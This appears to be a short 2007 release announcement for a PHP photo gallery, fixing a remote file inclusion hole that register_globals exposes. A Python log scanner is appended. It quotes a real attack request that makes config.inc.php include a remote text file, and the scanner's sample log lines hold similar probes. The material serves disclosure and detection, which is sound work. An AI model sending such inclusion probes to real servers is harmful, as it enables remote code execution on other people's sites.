Original 0.11.2

May 14 2007

While I haven’t really touched Original for ages now, I needed to roll out a 0.11.2 now. If you have register_globals set to on, it may be possible for the bad guys to feed a variable with a GET method which is later used to include other bits with require.

It looks like such an injected include file can be very curious. In any case, using register_globals is not a very safe thing to do, and I’m not sure allowing remote files to be included is a good choice either.

Grep your Apache logs for something like this to see if you’ve been poked for the vulnerability:

"GET /photos/inc/config.inc.php?x[1]=http://board.4sql.net/login.txt? HTTP/1.1"
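
The log check above as a script, added here as an example and not part of the original post or of Original's code. It goes beyond the one literal request shown: it flags any request to a .php path whose query parameter value starts with a remote URL, including percent-encoded variants a plain grep would miss. The log entries, IP addresses and the remote.example host are constructed, and the function name is hypothetical.

```python
import re
import sys
from urllib.parse import urlsplit, parse_qsl

# Request line inside an Apache access-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Parameter value that begins with a remote URL scheme (checked after decoding)
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample entries (documentation IPs, made-up timestamps and sizes)
SAMPLE_LOG = [
    '192.0.2.10 - - [14/May/2007:10:01:02 +0000] "GET /photos/index.php?gallery=summer HTTP/1.1" 200 5120',
    '203.0.113.7 - - [14/May/2007:10:01:05 +0000] "GET /photos/inc/config.inc.php?x[1]=http://board.4sql.net/login.txt? HTTP/1.1" 200 312',
    '203.0.113.7 - - [14/May/2007:10:01:09 +0000] "GET /photos/inc/config.inc.php?x%5B1%5D=HTTP%3A%2F%2Fremote.example%2Fa.txt%3F HTTP/1.1" 200 312',
    '192.0.2.44 - - [14/May/2007:10:02:00 +0000] "GET /photos/about.html?ref=http://blog.example/ HTTP/1.1" 200 800',
]


def find_remote_include_probes(lines):
    """Return (line_no, path, param, value) for every request to a .php
    path that carries a query parameter pointing at a remote URL."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        try:
            target = urlsplit(match.group("target"))
        except ValueError:  # malformed target, nothing to parse
            continue
        # Assumption: only .php paths are of interest; this keeps ordinary
        # pages with a URL in a "ref"-style parameter out of the results.
        if not target.path.lower().endswith(".php"):
            continue
        # parse_qsl percent-decodes names and values, so an encoded probe
        # (http%3A%2F%2F...) is reported the same way as a plain one.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append((line_no, target.path, name, value))
    return hits


if __name__ == "__main__":
    # Pass a log file path, or run without arguments to scan the samples.
    lines = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG
    for hit in find_remote_include_probes(lines):
        print(*hit, sep="\t")
```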